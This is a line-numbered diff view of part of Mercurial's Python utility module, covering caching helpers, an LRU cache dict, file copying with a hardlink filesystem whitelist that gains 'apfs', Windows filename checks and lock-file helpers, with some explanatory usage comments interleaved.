974 974 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 975 self.name, level, optname, value, res))
976 976
977 977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 978 logdata=False, logdataapis=True):
979 979 """Turn a socket into a logging socket."""
980 980
981 981 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 982 states=states, logdata=logdata,
983 983 logdataapis=logdataapis)
984 984 return socketproxy(fh, observer)
985 985
986 986 def version():
987 987 """Return version information if available."""
988 988 try:
989 989 from . import __version__
990 990 return __version__.version
991 991 except ImportError:
992 992 return 'unknown'
993 993
994 994 def versiontuple(v=None, n=4):
995 995 """Parses a Mercurial version string into an N-tuple.
996 996
997 997 The version string to be parsed is specified with the ``v`` argument.
998 998 If it isn't defined, the current Mercurial version string will be parsed.
999 999
1000 1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 1001 returned values:
1002 1002
1003 1003 >>> v = b'3.6.1+190-df9b73d2d444'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, 1)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, 1, '190-df9b73d2d444')
1010 1010
1011 1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1013 1013
1014 1014 >>> v = b'3.6'
1015 1015 >>> versiontuple(v, 2)
1016 1016 (3, 6)
1017 1017 >>> versiontuple(v, 3)
1018 1018 (3, 6, None)
1019 1019 >>> versiontuple(v, 4)
1020 1020 (3, 6, None, None)
1021 1021
1022 1022 >>> v = b'3.9-rc'
1023 1023 >>> versiontuple(v, 2)
1024 1024 (3, 9)
1025 1025 >>> versiontuple(v, 3)
1026 1026 (3, 9, None)
1027 1027 >>> versiontuple(v, 4)
1028 1028 (3, 9, None, 'rc')
1029 1029
1030 1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 1031 >>> versiontuple(v, 2)
1032 1032 (3, 9)
1033 1033 >>> versiontuple(v, 3)
1034 1034 (3, 9, None)
1035 1035 >>> versiontuple(v, 4)
1036 1036 (3, 9, None, 'rc+2-02a8fea4289b')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040 parts = remod.split('[+-]', v, 1)
1041 1041 if len(parts) == 1:
1042 1042 vparts, extra = parts[0], None
1043 1043 else:
1044 1044 vparts, extra = parts
1045 1045
1046 1046 vints = []
1047 1047 for i in vparts.split('.'):
1048 1048 try:
1049 1049 vints.append(int(i))
1050 1050 except ValueError:
1051 1051 break
1052 1052 # (3, 6) -> (3, 6, None)
1053 1053 while len(vints) < 3:
1054 1054 vints.append(None)
1055 1055
1056 1056 if n == 2:
1057 1057 return (vints[0], vints[1])
1058 1058 if n == 3:
1059 1059 return (vints[0], vints[1], vints[2])
1060 1060 if n == 4:
1061 1061 return (vints[0], vints[1], vints[2], extra)
1062 1062
1063 1063 def cachefunc(func):
1064 1064 '''cache the result of function calls'''
1065 1065 # XXX doesn't handle keyword args
1066 1066 if func.__code__.co_argcount == 0:
1067 1067 cache = []
1068 1068 def f():
1069 1069 if len(cache) == 0:
1070 1070 cache.append(func())
1071 1071 return cache[0]
1072 1072 return f
1073 1073 cache = {}
1074 1074 if func.__code__.co_argcount == 1:
1075 1075 # we gain a small amount of time because
1076 1076 # we don't need to pack/unpack the list
1077 1077 def f(arg):
1078 1078 if arg not in cache:
1079 1079 cache[arg] = func(arg)
1080 1080 return cache[arg]
1081 1081 else:
1082 1082 def f(*args):
1083 1083 if args not in cache:
1084 1084 cache[args] = func(*args)
1085 1085 return cache[args]
1086 1086
1087 1087 return f
1088 1088
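# Illustrative sketch (not run as a doctest): repeated calls with the same
# positional argument hit the cache instead of the wrapped function.
#
#   >>> calls = []
#   >>> def double(x):
#   ...     calls.append(x)
#   ...     return x * 2
#   >>> cached = cachefunc(double)
#   >>> cached(2), cached(2), calls
#   (4, 4, [2])
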
1089 1089 class cow(object):
1090 1090 """helper class to make copy-on-write easier
1091 1091
1092 1092 Call preparewrite before doing any writes.
1093 1093 """
1094 1094
1095 1095 def preparewrite(self):
1096 1096 """call this before writes, return self or a copied new object"""
1097 1097 if getattr(self, '_copied', 0):
1098 1098 self._copied -= 1
1099 1099 return self.__class__(self)
1100 1100 return self
1101 1101
1102 1102 def copy(self):
1103 1103 """always do a cheap copy"""
1104 1104 self._copied = getattr(self, '_copied', 0) + 1
1105 1105 return self
1106 1106
1107 1107 class sortdict(collections.OrderedDict):
1108 1108 '''a simple sorted dictionary
1109 1109
1110 1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1111 1111 >>> d2 = d1.copy()
1112 1112 >>> d2
1113 1113 sortdict([('a', 0), ('b', 1)])
1114 1114 >>> d2.update([(b'a', 2)])
1115 1115 >>> list(d2.keys()) # should still be in last-set order
1116 1116 ['b', 'a']
1117 1117 '''
1118 1118
1119 1119 def __setitem__(self, key, value):
1120 1120 if key in self:
1121 1121 del self[key]
1122 1122 super(sortdict, self).__setitem__(key, value)
1123 1123
1124 1124 if pycompat.ispypy:
1125 1125 # __setitem__() isn't called as of PyPy 5.8.0
1126 1126 def update(self, src):
1127 1127 if isinstance(src, dict):
1128 1128 src = src.iteritems()
1129 1129 for k, v in src:
1130 1130 self[k] = v
1131 1131
1132 1132 class cowdict(cow, dict):
1133 1133 """copy-on-write dict
1134 1134
1135 1135 Be sure to call d = d.preparewrite() before writing to d.
1136 1136
1137 1137 >>> a = cowdict()
1138 1138 >>> a is a.preparewrite()
1139 1139 True
1140 1140 >>> b = a.copy()
1141 1141 >>> b is a
1142 1142 True
1143 1143 >>> c = b.copy()
1144 1144 >>> c is a
1145 1145 True
1146 1146 >>> a = a.preparewrite()
1147 1147 >>> b is a
1148 1148 False
1149 1149 >>> a is a.preparewrite()
1150 1150 True
1151 1151 >>> c = c.preparewrite()
1152 1152 >>> b is c
1153 1153 False
1154 1154 >>> b is b.preparewrite()
1155 1155 True
1156 1156 """
1157 1157
1158 1158 class cowsortdict(cow, sortdict):
1159 1159 """copy-on-write sortdict
1160 1160
1161 1161 Be sure to call d = d.preparewrite() before writing to d.
1162 1162 """
1163 1163
1164 1164 class transactional(object):
1165 1165 """Base class for making a transactional type into a context manager."""
1166 1166 __metaclass__ = abc.ABCMeta
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def close(self):
1170 1170 """Successfully closes the transaction."""
1171 1171
1172 1172 @abc.abstractmethod
1173 1173 def release(self):
1174 1174 """Marks the end of the transaction.
1175 1175
1176 1176 If the transaction has not been closed, it will be aborted.
1177 1177 """
1178 1178
1179 1179 def __enter__(self):
1180 1180 return self
1181 1181
1182 1182 def __exit__(self, exc_type, exc_val, exc_tb):
1183 1183 try:
1184 1184 if exc_type is None:
1185 1185 self.close()
1186 1186 finally:
1187 1187 self.release()
1188 1188
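# Illustrative sketch (not run as a doctest): a subclass only has to supply
# close() and release() to get context-manager behavior.
#
#   class demotransaction(transactional):
#       def close(self):
#           pass  # commit side effects here
#       def release(self):
#           pass  # abort here if close() never ran
#
#   with demotransaction():
#       pass  # close() runs only if the body raised no exception
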
1189 1189 @contextlib.contextmanager
1190 1190 def acceptintervention(tr=None):
1191 1191 """A context manager that closes the transaction on InterventionRequired
1192 1192
1193 1193 If no transaction was provided, this simply runs the body and returns
1194 1194 """
1195 1195 if not tr:
1196 1196 yield
1197 1197 return
1198 1198 try:
1199 1199 yield
1200 1200 tr.close()
1201 1201 except error.InterventionRequired:
1202 1202 tr.close()
1203 1203 raise
1204 1204 finally:
1205 1205 tr.release()
1206 1206
1207 1207 @contextlib.contextmanager
1208 1208 def nullcontextmanager():
1209 1209 yield
1210 1210
1211 1211 class _lrucachenode(object):
1212 1212 """A node in a doubly linked list.
1213 1213
1214 1214 Holds a reference to nodes on either side as well as a key-value
1215 1215 pair for the dictionary entry.
1216 1216 """
1217 1217 __slots__ = (u'next', u'prev', u'key', u'value')
1218 1218
1219 1219 def __init__(self):
1220 1220 self.next = None
1221 1221 self.prev = None
1222 1222
1223 1223 self.key = _notset
1224 1224 self.value = None
1225 1225
1226 1226 def markempty(self):
1227 1227 """Mark the node as emptied."""
1228 1228 self.key = _notset
1229 1229
1230 1230 class lrucachedict(object):
1231 1231 """Dict that caches most recent accesses and sets.
1232 1232
1233 1233 The dict consists of an actual backing dict - indexed by original
1234 1234 key - and a doubly linked circular list defining the order of entries in
1235 1235 the cache.
1236 1236
1237 1237 The head node is the newest entry in the cache. If the cache is full,
1238 1238 we recycle head.prev and make it the new head. Cache accesses result in
1239 1239 the node being moved to before the existing head and being marked as the
1240 1240 new head node.
1241 1241 """
1242 1242 def __init__(self, max):
1243 1243 self._cache = {}
1244 1244
1245 1245 self._head = head = _lrucachenode()
1246 1246 head.prev = head
1247 1247 head.next = head
1248 1248 self._size = 1
1249 1249 self._capacity = max
1250 1250
1251 1251 def __len__(self):
1252 1252 return len(self._cache)
1253 1253
1254 1254 def __contains__(self, k):
1255 1255 return k in self._cache
1256 1256
1257 1257 def __iter__(self):
1258 1258 # We don't have to iterate in cache order, but why not.
1259 1259 n = self._head
1260 1260 for i in range(len(self._cache)):
1261 1261 yield n.key
1262 1262 n = n.next
1263 1263
1264 1264 def __getitem__(self, k):
1265 1265 node = self._cache[k]
1266 1266 self._movetohead(node)
1267 1267 return node.value
1268 1268
1269 1269 def __setitem__(self, k, v):
1270 1270 node = self._cache.get(k)
1271 1271 # Replace existing value and mark as newest.
1272 1272 if node is not None:
1273 1273 node.value = v
1274 1274 self._movetohead(node)
1275 1275 return
1276 1276
1277 1277 if self._size < self._capacity:
1278 1278 node = self._addcapacity()
1279 1279 else:
1280 1280 # Grab the last/oldest item.
1281 1281 node = self._head.prev
1282 1282
1283 1283 # At capacity. Kill the old entry.
1284 1284 if node.key is not _notset:
1285 1285 del self._cache[node.key]
1286 1286
1287 1287 node.key = k
1288 1288 node.value = v
1289 1289 self._cache[k] = node
1290 1290 # And mark it as newest entry. No need to adjust order since it
1291 1291 # is already self._head.prev.
1292 1292 self._head = node
1293 1293
1294 1294 def __delitem__(self, k):
1295 1295 node = self._cache.pop(k)
1296 1296 node.markempty()
1297 1297
1298 1298 # Temporarily mark as newest item before re-adjusting head to make
1299 1299 # this node the oldest item.
1300 1300 self._movetohead(node)
1301 1301 self._head = node.next
1302 1302
1303 1303 # Additional dict methods.
1304 1304
1305 1305 def get(self, k, default=None):
1306 1306 try:
1307 1307 return self._cache[k].value
1308 1308 except KeyError:
1309 1309 return default
1310 1310
1311 1311 def clear(self):
1312 1312 n = self._head
1313 1313 while n.key is not _notset:
1314 1314 n.markempty()
1315 1315 n = n.next
1316 1316
1317 1317 self._cache.clear()
1318 1318
1319 1319 def copy(self):
1320 1320 result = lrucachedict(self._capacity)
1321 1321 n = self._head.prev
1322 1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1323 1323 for i in range(len(self._cache)):
1324 1324 result[n.key] = n.value
1325 1325 n = n.prev
1326 1326 return result
1327 1327
1328 1328 def _movetohead(self, node):
1329 1329 """Mark a node as the newest, making it the new head.
1330 1330
1331 1331 When a node is accessed, it becomes the freshest entry in the LRU
1332 1332 list, which is denoted by self._head.
1333 1333
1334 1334 Visually, let's make ``N`` the new head node (* denotes head):
1335 1335
1336 1336 previous/oldest <-> head <-> next/next newest
1337 1337
1338 1338 ----<->--- A* ---<->-----
1339 1339 | |
1340 1340 E <-> D <-> N <-> C <-> B
1341 1341
1342 1342 To:
1343 1343
1344 1344 ----<->--- N* ---<->-----
1345 1345 | |
1346 1346 E <-> D <-> C <-> B <-> A
1347 1347
1348 1348 This requires the following moves:
1349 1349
1350 1350 C.next = D (node.prev.next = node.next)
1351 1351 D.prev = C (node.next.prev = node.prev)
1352 1352 E.next = N (head.prev.next = node)
1353 1353 N.prev = E (node.prev = head.prev)
1354 1354 N.next = A (node.next = head)
1355 1355 A.prev = N (head.prev = node)
1356 1356 """
1357 1357 head = self._head
1358 1358 # C.next = D
1359 1359 node.prev.next = node.next
1360 1360 # D.prev = C
1361 1361 node.next.prev = node.prev
1362 1362 # N.prev = E
1363 1363 node.prev = head.prev
1364 1364 # N.next = A
1365 1365 # It is tempting to do just "head" here, however if node is
1366 1366 # adjacent to head, this will do bad things.
1367 1367 node.next = head.prev.next
1368 1368 # E.next = N
1369 1369 node.next.prev = node
1370 1370 # A.prev = N
1371 1371 node.prev.next = node
1372 1372
1373 1373 self._head = node
1374 1374
1375 1375 def _addcapacity(self):
1376 1376 """Add a node to the circular linked list.
1377 1377
1378 1378 The new node is inserted before the head node.
1379 1379 """
1380 1380 head = self._head
1381 1381 node = _lrucachenode()
1382 1382 head.prev.next = node
1383 1383 node.prev = head.prev
1384 1384 node.next = head
1385 1385 head.prev = node
1386 1386 self._size += 1
1387 1387 return node
1388 1388
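# Illustrative sketch (not run as a doctest): inserting past capacity evicts
# the least recently used key.
#
#   >>> d = lrucachedict(2)
#   >>> d[b'a'] = 1
#   >>> d[b'b'] = 2
#   >>> d[b'a']       # touch b'a' so b'b' becomes the oldest entry
#   1
#   >>> d[b'c'] = 3   # evicts b'b'
#   >>> b'b' in d
#   False
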
1389 1389 def lrucachefunc(func):
1390 1390 '''cache most recent results of function calls'''
1391 1391 cache = {}
1392 1392 order = collections.deque()
1393 1393 if func.__code__.co_argcount == 1:
1394 1394 def f(arg):
1395 1395 if arg not in cache:
1396 1396 if len(cache) > 20:
1397 1397 del cache[order.popleft()]
1398 1398 cache[arg] = func(arg)
1399 1399 else:
1400 1400 order.remove(arg)
1401 1401 order.append(arg)
1402 1402 return cache[arg]
1403 1403 else:
1404 1404 def f(*args):
1405 1405 if args not in cache:
1406 1406 if len(cache) > 20:
1407 1407 del cache[order.popleft()]
1408 1408 cache[args] = func(*args)
1409 1409 else:
1410 1410 order.remove(args)
1411 1411 order.append(args)
1412 1412 return cache[args]
1413 1413
1414 1414 return f
1415 1415
1416 1416 class propertycache(object):
1417 1417 def __init__(self, func):
1418 1418 self.func = func
1419 1419 self.name = func.__name__
1420 1420 def __get__(self, obj, type=None):
1421 1421 result = self.func(obj)
1422 1422 self.cachevalue(obj, result)
1423 1423 return result
1424 1424
1425 1425 def cachevalue(self, obj, value):
1426 1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1427 1427 obj.__dict__[self.name] = value
1428 1428
1429 1429 def clearcachedproperty(obj, prop):
1430 1430 '''clear a cached property value, if one has been set'''
1431 1431 if prop in obj.__dict__:
1432 1432 del obj.__dict__[prop]
1433 1433
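# Illustrative sketch (not run as a doctest; computevalue() is a hypothetical
# helper): the decorated method runs once, after which the cached result in
# the instance __dict__ shadows the descriptor.
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return computevalue()
#
#   r = repoish()
#   r.expensive  # computed, then cached on the instance
#   r.expensive  # plain attribute lookup, no recomputation
#   clearcachedproperty(r, 'expensive')  # next access recomputes
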
1434 1434 def increasingchunks(source, min=1024, max=65536):
1435 1435 '''return no less than min bytes per chunk while data remains,
1436 1436 doubling min after each chunk until it reaches max'''
1437 1437 def log2(x):
1438 1438 if not x:
1439 1439 return 0
1440 1440 i = 0
1441 1441 while x:
1442 1442 x >>= 1
1443 1443 i += 1
1444 1444 return i - 1
1445 1445
1446 1446 buf = []
1447 1447 blen = 0
1448 1448 for chunk in source:
1449 1449 buf.append(chunk)
1450 1450 blen += len(chunk)
1451 1451 if blen >= min:
1452 1452 if min < max:
1453 1453 min = min << 1
1454 1454 nmin = 1 << log2(blen)
1455 1455 if nmin > min:
1456 1456 min = nmin
1457 1457 if min > max:
1458 1458 min = max
1459 1459 yield ''.join(buf)
1460 1460 blen = 0
1461 1461 buf = []
1462 1462 if buf:
1463 1463 yield ''.join(buf)
1464 1464
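# Illustrative sketch (not run as a doctest): many small chunks coalesce into
# progressively larger ones, reducing the number of downstream writes.
#
#   >>> [len(c) for c in increasingchunks([b'x' * 512] * 16, min=1024)]
#   [1024, 2048, 4096, 1024]
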
1465 1465 def always(fn):
1466 1466 return True
1467 1467
1468 1468 def never(fn):
1469 1469 return False
1470 1470
1471 1471 def nogc(func):
1472 1472 """disable garbage collector
1473 1473
1474 1474 Python's garbage collector triggers a GC each time a certain number of
1475 1475 container objects (the number being defined by gc.get_threshold()) are
1476 1476 allocated even when marked not to be tracked by the collector. Tracking has
1477 1477 no effect on when GCs are triggered, only on what objects the GC looks
1478 1478 into. As a workaround, disable GC while building complex (huge)
1479 1479 containers.
1480 1480
1481 1481 This garbage collector issue has been fixed in 2.7, but it still affects
1482 1482 CPython's performance.
1483 1483 """
1484 1484 def wrapper(*args, **kwargs):
1485 1485 gcenabled = gc.isenabled()
1486 1486 gc.disable()
1487 1487 try:
1488 1488 return func(*args, **kwargs)
1489 1489 finally:
1490 1490 if gcenabled:
1491 1491 gc.enable()
1492 1492 return wrapper
1493 1493
1494 1494 if pycompat.ispypy:
1495 1495 # PyPy runs slower with gc disabled
1496 1496 nogc = lambda x: x
1497 1497
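# Illustrative sketch (not run as a doctest; buildindex is a hypothetical hot
# path): decorate builders of huge containers so the allocation burst does not
# trigger collection passes mid-build.
#
#   @nogc
#   def buildindex(entries):
#       return dict((e[0], e) for e in entries)
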
1498 1498 def pathto(root, n1, n2):
1499 1499 '''return the relative path from one place to another.
1500 1500 root should use os.sep to separate directories
1501 1501 n1 should use os.sep to separate directories
1502 1502 n2 should use "/" to separate directories
1503 1503 returns an os.sep-separated path.
1504 1504
1505 1505 If n1 is a relative path, it's assumed it's
1506 1506 relative to root.
1507 1507 n2 should always be relative to root.
1508 1508 '''
1509 1509 if not n1:
1510 1510 return localpath(n2)
1511 1511 if os.path.isabs(n1):
1512 1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1513 1513 return os.path.join(root, localpath(n2))
1514 1514 n2 = '/'.join((pconvert(root), n2))
1515 1515 a, b = splitpath(n1), n2.split('/')
1516 1516 a.reverse()
1517 1517 b.reverse()
1518 1518 while a and b and a[-1] == b[-1]:
1519 1519 a.pop()
1520 1520 b.pop()
1521 1521 b.reverse()
1522 1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523 1523
1524 1524 # the location of data files matching the source code
1525 1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1526 1526 # executable version (py2exe) doesn't support __file__
1527 1527 datapath = os.path.dirname(pycompat.sysexecutable)
1528 1528 else:
1529 1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1530 1530
1531 1531 i18n.setdatapath(datapath)
1532 1532
1533 1533 def checksignature(func):
1534 1534 '''wrap a function with code to check for calling errors'''
1535 1535 def check(*args, **kwargs):
1536 1536 try:
1537 1537 return func(*args, **kwargs)
1538 1538 except TypeError:
1539 1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1540 1540 raise error.SignatureError
1541 1541 raise
1542 1542
1543 1543 return check
1544 1544
1545 1545 # a whitelist of known filesystems where hardlinks work reliably
1546 1546 _hardlinkfswhitelist = {
1547 'apfs',
1547 1548 'btrfs',
1548 1549 'ext2',
1549 1550 'ext3',
1550 1551 'ext4',
1551 1552 'hfs',
1552 1553 'jfs',
1553 1554 'NTFS',
1554 1555 'reiserfs',
1555 1556 'tmpfs',
1556 1557 'ufs',
1557 1558 'xfs',
1558 1559 'zfs',
1559 1560 }
1560 1561
1561 1562 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1562 1563 '''copy a file, preserving mode and optionally other stat info like
1563 1564 atime/mtime
1564 1565
1565 1566 checkambig argument is used with filestat, and is useful only if
1566 1567 destination file is guarded by any lock (e.g. repo.lock or
1567 1568 repo.wlock).
1568 1569
1569 1570 copystat and checkambig should be exclusive.
1570 1571 '''
1571 1572 assert not (copystat and checkambig)
1572 1573 oldstat = None
1573 1574 if os.path.lexists(dest):
1574 1575 if checkambig:
1575 1576 oldstat = checkambig and filestat.frompath(dest)
1576 1577 unlink(dest)
1577 1578 if hardlink:
1578 1579 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1579 1580 # unless we are confident that dest is on a whitelisted filesystem.
1580 1581 try:
1581 1582 fstype = getfstype(os.path.dirname(dest))
1582 1583 except OSError:
1583 1584 fstype = None
1584 1585 if fstype not in _hardlinkfswhitelist:
1585 1586 hardlink = False
1586 1587 if hardlink:
1587 1588 try:
1588 1589 oslink(src, dest)
1589 1590 return
1590 1591 except (IOError, OSError):
1591 1592 pass # fall back to normal copy
1592 1593 if os.path.islink(src):
1593 1594 os.symlink(os.readlink(src), dest)
1594 1595 # copytime is ignored for symlinks, but in general copytime isn't needed
1595 1596 # for them anyway
1596 1597 else:
1597 1598 try:
1598 1599 shutil.copyfile(src, dest)
1599 1600 if copystat:
1600 1601 # copystat also copies mode
1601 1602 shutil.copystat(src, dest)
1602 1603 else:
1603 1604 shutil.copymode(src, dest)
1604 1605 if oldstat and oldstat.stat:
1605 1606 newstat = filestat.frompath(dest)
1606 1607 if newstat.isambig(oldstat):
1607 1608 # stat of copied file is ambiguous to original one
1608 1609 advanced = (
1609 1610 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1610 1611 os.utime(dest, (advanced, advanced))
1611 1612 except shutil.Error as inst:
1612 1613 raise error.Abort(str(inst))
1613 1614
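# Illustrative sketch (not run as a doctest; paths are arbitrary): callers ask
# for hardlinks with hardlink=True, and the whitelist check above silently
# downgrades to a real copy on filesystems such as CIFS where links misbehave.
#
#   copyfile(b'src/file.bin', b'dst/file.bin', hardlink=True)
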
1614 1615 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1615 1616 """Copy a directory tree using hardlinks if possible."""
1616 1617 num = 0
1617 1618
1618 1619 gettopic = lambda: hardlink and _('linking') or _('copying')
1619 1620
1620 1621 if os.path.isdir(src):
1621 1622 if hardlink is None:
1622 1623 hardlink = (os.stat(src).st_dev ==
1623 1624 os.stat(os.path.dirname(dst)).st_dev)
1624 1625 topic = gettopic()
1625 1626 os.mkdir(dst)
1626 1627 for name, kind in listdir(src):
1627 1628 srcname = os.path.join(src, name)
1628 1629 dstname = os.path.join(dst, name)
1629 1630 def nprog(t, pos):
1630 1631 if pos is not None:
1631 1632 return progress(t, pos + num)
1632 1633 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1633 1634 num += n
1634 1635 else:
1635 1636 if hardlink is None:
1636 1637 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1637 1638 os.stat(os.path.dirname(dst)).st_dev)
1638 1639 topic = gettopic()
1639 1640
1640 1641 if hardlink:
1641 1642 try:
1642 1643 oslink(src, dst)
1643 1644 except (IOError, OSError):
1644 1645 hardlink = False
1645 1646 shutil.copy(src, dst)
1646 1647 else:
1647 1648 shutil.copy(src, dst)
1648 1649 num += 1
1649 1650 progress(topic, num)
1650 1651 progress(topic, None)
1651 1652
1652 1653 return hardlink, num
1653 1654
1654 1655 _winreservednames = {
1655 1656 'con', 'prn', 'aux', 'nul',
1656 1657 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1657 1658 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1658 1659 }
1659 1660 _winreservedchars = ':*?"<>|'
1660 1661 def checkwinfilename(path):
1661 1662 r'''Check that the base-relative path is a valid filename on Windows.
1662 1663 Returns None if the path is ok, or a UI string describing the problem.
1663 1664
1664 1665 >>> checkwinfilename(b"just/a/normal/path")
1665 1666 >>> checkwinfilename(b"foo/bar/con.xml")
1666 1667 "filename contains 'con', which is reserved on Windows"
1667 1668 >>> checkwinfilename(b"foo/con.xml/bar")
1668 1669 "filename contains 'con', which is reserved on Windows"
1669 1670 >>> checkwinfilename(b"foo/bar/xml.con")
1670 1671 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1671 1672 "filename contains 'AUX', which is reserved on Windows"
1672 1673 >>> checkwinfilename(b"foo/bar/bla:.txt")
1673 1674 "filename contains ':', which is reserved on Windows"
1674 1675 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1675 1676 "filename contains '\\x07', which is invalid on Windows"
1676 1677 >>> checkwinfilename(b"foo/bar/bla ")
1677 1678 "filename ends with ' ', which is not allowed on Windows"
1678 1679 >>> checkwinfilename(b"../bar")
1679 1680 >>> checkwinfilename(b"foo\\")
1680 1681 "filename ends with '\\', which is invalid on Windows"
1681 1682 >>> checkwinfilename(b"foo\\/bar")
1682 1683 "directory name ends with '\\', which is invalid on Windows"
1683 1684 '''
1684 1685 if path.endswith('\\'):
1685 1686 return _("filename ends with '\\', which is invalid on Windows")
1686 1687 if '\\/' in path:
1687 1688 return _("directory name ends with '\\', which is invalid on Windows")
1688 1689 for n in path.replace('\\', '/').split('/'):
1689 1690 if not n:
1690 1691 continue
1691 1692 for c in _filenamebytestr(n):
1692 1693 if c in _winreservedchars:
1693 1694 return _("filename contains '%s', which is reserved "
1694 1695 "on Windows") % c
1695 1696 if ord(c) <= 31:
1696 1697 return _("filename contains '%s', which is invalid "
1697 1698 "on Windows") % stringutil.escapestr(c)
1698 1699 base = n.split('.')[0]
1699 1700 if base and base.lower() in _winreservednames:
1700 1701 return _("filename contains '%s', which is reserved "
1701 1702 "on Windows") % base
1702 1703 t = n[-1:]
1703 1704 if t in '. ' and n not in '..':
1704 1705 return _("filename ends with '%s', which is not allowed "
1705 1706 "on Windows") % t
1706 1707
1707 1708 if pycompat.iswindows:
1708 1709 checkosfilename = checkwinfilename
1709 1710 timer = time.clock
1710 1711 else:
1711 1712 checkosfilename = platform.checkosfilename
1712 1713 timer = time.time
1713 1714
1714 1715 if safehasattr(time, "perf_counter"):
1715 1716 timer = time.perf_counter
1716 1717
1717 1718 def makelock(info, pathname):
1718 1719 """Create a lock file atomically if possible
1719 1720
1720 1721 This may leave a stale lock file if symlink isn't supported and signal
1721 1722 interrupt is enabled.
1722 1723 """
1723 1724 try:
1724 1725 return os.symlink(info, pathname)
1725 1726 except OSError as why:
1726 1727 if why.errno == errno.EEXIST:
1727 1728 raise
1728 1729 except AttributeError: # no symlink in os
1729 1730 pass
1730 1731
1731 1732 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1732 1733 ld = os.open(pathname, flags)
1733 1734 os.write(ld, info)
1734 1735 os.close(ld)
1735 1736
1736 1737 def readlock(pathname):
1737 1738 try:
1738 1739 return os.readlink(pathname)
1739 1740 except OSError as why:
1740 1741 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1741 1742 raise
1742 1743 except AttributeError: # no symlink in os
1743 1744 pass
1744 1745 fp = posixfile(pathname, 'rb')
1745 1746 r = fp.read()
1746 1747 fp.close()
1747 1748 return r
1748 1749
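# A sketch of the round-trip (path and contents hypothetical): makelock
# prefers a symlink whose target carries the lock info, and falls back to
# an O_EXCL regular file where symlinks are unavailable; readlock mirrors
# that by trying os.readlink() first and then reading file contents.
#
#   makelock(b'host:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')   # -> 'host:12345'
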
1749 1750 def fstat(fp):
1750 1751 '''stat file object that may not have fileno method.'''
1751 1752 try:
1752 1753 return os.fstat(fp.fileno())
1753 1754 except AttributeError:
1754 1755 return os.stat(fp.name)
1755 1756
1756 1757 # File system features
1757 1758
1758 1759 def fscasesensitive(path):
1759 1760 """
1760 1761 Return true if the given path is on a case-sensitive filesystem
1761 1762
1762 1763 Requires a path (like /foo/.hg) ending with a foldable final
1763 1764 directory component.
1764 1765 """
1765 1766 s1 = os.lstat(path)
1766 1767 d, b = os.path.split(path)
1767 1768 b2 = b.upper()
1768 1769 if b == b2:
1769 1770 b2 = b.lower()
1770 1771 if b == b2:
1771 1772 return True # no evidence against case sensitivity
1772 1773 p2 = os.path.join(d, b2)
1773 1774 try:
1774 1775 s2 = os.lstat(p2)
1775 1776 if s2 == s1:
1776 1777 return False
1777 1778 return True
1778 1779 except OSError:
1779 1780 return True
1780 1781
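# For example, probing a repository's '.hg' directory (path hypothetical):
# on a case-insensitive filesystem such as the macOS default, the '.HG'
# probe resolves to the same lstat result and fscasesensitive(b'/repo/.hg')
# returns False; on a typical Linux ext4 mount the probe fails to stat and
# the function returns True.
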
1781 1782 try:
1782 1783 import re2
1783 1784 _re2 = None
1784 1785 except ImportError:
1785 1786 _re2 = False
1786 1787
1787 1788 class _re(object):
1788 1789 def _checkre2(self):
1789 1790 global _re2
1790 1791 try:
1791 1792 # check if match works, see issue3964
1792 1793 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1793 1794 except ImportError:
1794 1795 _re2 = False
1795 1796
1796 1797 def compile(self, pat, flags=0):
1797 1798 '''Compile a regular expression, using re2 if possible
1798 1799
1799 1800 For best performance, use only re2-compatible regexp features. The
1800 1801 only flags from the re module that are re2-compatible are
1801 1802 IGNORECASE and MULTILINE.'''
1802 1803 if _re2 is None:
1803 1804 self._checkre2()
1804 1805 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1805 1806 if flags & remod.IGNORECASE:
1806 1807 pat = '(?i)' + pat
1807 1808 if flags & remod.MULTILINE:
1808 1809 pat = '(?m)' + pat
1809 1810 try:
1810 1811 return re2.compile(pat)
1811 1812 except re2.error:
1812 1813 pass
1813 1814 return remod.compile(pat, flags)
1814 1815
1815 1816 @propertycache
1816 1817 def escape(self):
1817 1818 '''Return the version of escape corresponding to self.compile.
1818 1819
1819 1820 This is imperfect because whether re2 or re is used for a particular
1820 1821 function depends on the flags, etc, but it's the best we can do.
1821 1822 '''
1822 1823 global _re2
1823 1824 if _re2 is None:
1824 1825 self._checkre2()
1825 1826 if _re2:
1826 1827 return re2.escape
1827 1828 else:
1828 1829 return remod.escape
